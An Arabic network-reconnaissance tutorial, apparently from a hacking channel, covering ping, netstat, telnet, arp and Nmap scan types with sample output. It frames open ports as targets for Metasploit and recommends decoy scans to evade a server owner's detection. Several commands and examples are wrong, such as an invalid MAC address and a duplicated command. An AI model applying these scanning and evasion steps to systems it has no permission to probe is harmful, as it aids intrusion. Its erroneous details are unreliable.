يستخدم هذا الأمر للتأكد من عمل برووتوكول (TCP/IP) والذي يعني أن جهاز الكمبيوتر يرى

الشبكة حيث يقوم الأمر بإرسال 4 حزم من البيانات والتأكد من استقبالها في الطرفا لآخر للتأكد من

صلاحية استخدام جهازك للبروتوكول اكتب
Ping 127.0.0.1
للتأكد من رؤية أي جهاز آخر على الشبكة اكتب رقم الآى بى بتاع الجهاز اللى انت تريده
Ping ip address of the pc
مثال
pin 10.10.10.25

أى أنك تختبر الجهاز اللى رقمه 25


الامر nslookup

يقوم هذا الأمر بعرض عنوان السيرفر ورقم الأي بي

نتيجة تنفيذ الأمر لح تطلع
Default Server: هنا اسم الشركة

Address: هنا رقم الآبى الخاص بالشركة

*********@hackteep************************

لمعرفة الايبيهات الموجودة بالشبكة كلها


NETSTAT

START>>RUN>>COMMAND>>NETSTAT -N

هيطلع لك كل الايبيهات الي في الشبكه

وهذه معلومات عن هذا الامر

NETSTAT

NETSTAT حالة الشبكة يظهر جميع المنافذ المتصلة
NETSTAT مسافة-A يظهر ارقام الايبي المتصلة وحالتها
NETSTAT مسافة-E يظهر حالة الشبكة بشكل عام
NETSTAT مسافة-N يظهر ارقام البورتات والايبيات المتصلة
NETSTAT مسافة-P يظهر البروتوكولات المتصلة بجهازك
NETSTAT مسافة-R يظهر اجهزة الروترز في شبكتك
NETSTAT مسافة-S يظهر حالة الشبكة والاجهزة المتصلة


**********@hackteep*********************
telnet

وهو أمر يستخدم للدخول والتحكم عن بعدremote access
ويستخدم للدخول على الروتر بكتابه الأمر وبجواره ألأيبى الخاص بالروتر
هكذا telnet 192.168.2.1
وحيظهرلكloginتكتب أسم ألأدمن
وبعدها حيظهر الpasswordبكتابة صحيح سوف تستطيع التحكم فى الروتر عن بعد
2/arp
وهذا الأمر تكتبه للحصول على كل الأيبهات والماك أدرس اللى موجودة على الشبكة ويكتب على الشكل التالى
arp -a
وكمانarp -g
وكمان بيظهروا حالة أتصال ألأجهزة بالروتر أذا كانت دينمك ولا استاتيك
ولو عايز تعمل دليت لهوست عندك على الشبكة تكتب الأمر
arp -d
ولو عايز تضيف هوست على الشبكة تكتب ألأمر
arp -s 192.168.2.205 00-1h-4d-db-5r-4g
أول رقم الايبي الخاص بالجهاز
والتانى الماك أدرس
أداة Nmap وكيفية استخدامها في فحص الشبكات

من أشهر أدوات فحص الشبكات وأكثرها استخدما من قبل الهكر طبعا انأ بتوقع انوا الأداة ما وجدت خصيصا شانهم على كل حال هذه الأداة مفتحة المصدر و سهلة الاستخدام وجيدة جدا لفحص واستقصاء بعض المعلومات الأخرى عن الأجهزة الموجودة في الشبكة وألان سوف ندخل بالشرح مباشرة من دون لف ودوران ههههههههه

أولا انا سوف اشرح استخدام الأداة على الوندوز وليس لينكس ولكن كل الأوامر الذي سوف أنفذها تصلح لكلا النظامين لان المبدأ واحد:

اول شي امر –sP

هذا الامر متل امر البنج تمام بل هو بنفس

D:\nmap-5.51>nmap –sP 192.168.1.102
ويكون التانج كالتالي وانظر كيف حدد لنا الجهاز ايضا كم انت كبير يانيماب

Nmap scan report for 192.168.1.102

Host is up (0.00s latency).

MAC Address: 00:1A:92:8B:77:A7 (Asustek Computer)
وتاني شيئ هو الأمر –sT وهو لفحص المنافذ حيث سوف يقوم بفحص الف بورت ويخبرك انا كان مفتوحا او مفلتر:

D:\nmap-5.51>nmap –sT 192.168.1.101

Nmap scan report for 192.168.1.101

Host is up (0.00s latency).

Not shown: 999 filtered ports

PORT STATE SERVICE

21/tcp open ftp

MAC Address: 00:1A:92:8B:77:A7 (Asustek Computer)
انظر كيف كشف لنا ان البورت 21 مفتوح وهكذا بتحسن بتشغل الميتاسبلويت وتستغل البورت الشغل بشي ثغرة

اما الامر –sS فهوا يبعت Packet من نوع Syn

D:\nmap-5.51>nmap –sS 192.168.1.101

Nmap scan report for 192.168.1.101

Host is up (0.00s latency).

All 1000 scanned ports on 192.168.1.101 are filtered

MAC Address: 00:1A:92:8B:77:A7 (Asustek Computer)
انظر كيف ان جميع البورتات مفلتر…….

امر –sU يبعت Packet من نوع UDP

D:\nmap-5.51>nmap –sU 192.168.1.101

Nmap scan report for 192.168.1.101

Host is up (0.00s latency).

All 1000 scanned ports on 192.168.1.101 are open|filtered

MAC Address: 00:1A:92:8B:77:A7 (Asustek Computer)
امر –sA هاد الامر يرسل Packet من نوع ACK ولكن هذا الامر فقط يقول لنا اذا المنفذ مفلتر ولا لا

D:\nmap-5.51>nmap –sA 192.168.1.102

Nmap scan report for 192.168.1.102

Host is up (0.00s latency).

All 1000 scanned ports on 192.168.1.102 are filtered

MAC Address: 6C:F0:49:B4:36:8D (Giga-byte Technology Co.)
انظر كيف ظهرت فقط الفلترة ولا يقول شي على انه مفتوح او مغلق

امر –sO IP Protocol Scan

D:\nmap-5.51>nmap –sO 192.168.1.102

Nmap scan report for 192.168.1.102

Host is up (0.015s latency).

All 256 scanned ports on 192.168.1.102 are open|filtered

MAC Address: 6C:F0:49:B4:36:8D (Giga-byte Technology Co.)
امر –sV وهذا الامر يكشف لنا الخدمات الشغالة واصدراتها ان اتسطاع الان انتقلنا الى المتعة في النيم ماب

D:\nmap-5.51>nmap –sO 192.168.1.102

Nmap scan report for 192.168.1.102

Host is up (0.00s latency).

All 1000 scanned ports on 192.168.1.102 are filtered

MAC Address: 6C:F0:49:B4:36:8D (Giga-byte Technology Co.)
لكن يبدوا انه لايوجد حاليا بورت مفتوح في الاجهزة الموصولة معي بالشبكة على كل حال هذه هيا الطريقة

واما اذا اردنا الفحص السريع لاي بي فاننا نضع –F الذي تفحص فقط اشهر المنافذ

D:\nmap-5.51>nmap –sT -F 192.168.1.102

Host is up (0.0051s latency).

Not shown: 99 filtered ports

PORT STATE SERVICE

21/tcp open ftp

MAC Address: 6C:F0:49:B4:36:8D (Giga-byte Technology Co.)
امر –O لمعرف النظام

وامر –e لتحديد نوع الشبكة (wlan – eth0)interface يعني لو كان عنا شبكتين وحدة وايرس وتانية محلية وبهذه الطريقة نحدد نوع الشبكة اولاُ ثم بعدها نفحص

اما الامر –A فهو يجمع كل المعلومات من النظام وتحديد الاصدارات وفحص السكربتات ……..

D:\nmap-5.51>nmap –sU -A 192.168.1.102
واذا اردنا ان نحدد منفذ او منفذين فقط نستخدم –p 80,8080 وهكذا اما اذا اردنا مثلا انا نفحص المنافذ من 10 الى 100 نستخدم –p 10-100

D:\nmap-5.51>nmap –sS –p 80,8080 192.168.1.102

D:\nmap-5.51>nmap –sS –p 10-100 192.168.1.102
-v لرؤية عملية الفحص

-oN لحفظ النتائج على مستند نصي

D:\nmap-5.51>nmap –sS –p 80,8080 –v –oN log.txt 192.168.1.102
طبعا كن حذرا لانك يمكن اتنكشف وانت تفحص المنافذ من قبل صاحب الموقع او السيرفر

لذلك هنالك طريقة لتقسيم Packet مما يصعب من كشفك اما اذا اردت امر تتوه فيه السيرفر مالك غير:-D

D:\nmap-5.51>nmap -SS -D 192.168.1.102 192.168.1.103 192.168.1.104
هذا سوف يتوه صاحب السيرفر ويجعله يتوه عن الايبي الذي قام بالفحص وينسى الامر…

المصدر @hackteep
1👍1